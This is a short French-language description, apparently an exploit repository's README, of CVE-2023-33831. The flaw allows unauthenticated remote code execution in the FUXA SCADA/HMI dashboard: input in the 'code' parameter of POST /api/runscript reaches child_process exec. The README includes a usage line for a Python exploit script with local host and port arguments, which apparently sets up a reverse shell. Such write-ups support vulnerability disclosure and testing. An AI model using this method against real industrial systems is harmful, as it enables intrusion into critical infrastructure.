
Description et exploit de CVE-2023-33831 affectant le logiciel FUXA de visualisation de processus basé sur le web (SCADA/HMI/Dashboard).
La vulnérabilité affecte le composant de script de FUXA, en raison du manque de contrôle ou de nettoyage sur les entrées pouvant être contrôlées par les utilisateurs, permettant ainsi l'utilisation de méthodes dangereuses qui peuvent être exploitées pour exécuter du code à distance. La route affectée est /api/runscript, où il est possible d'exécuter des commandes sans avoir à s'authentifier via le paramètre code par la méthode POST en utilisant le module child_process via la fonction exec.
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>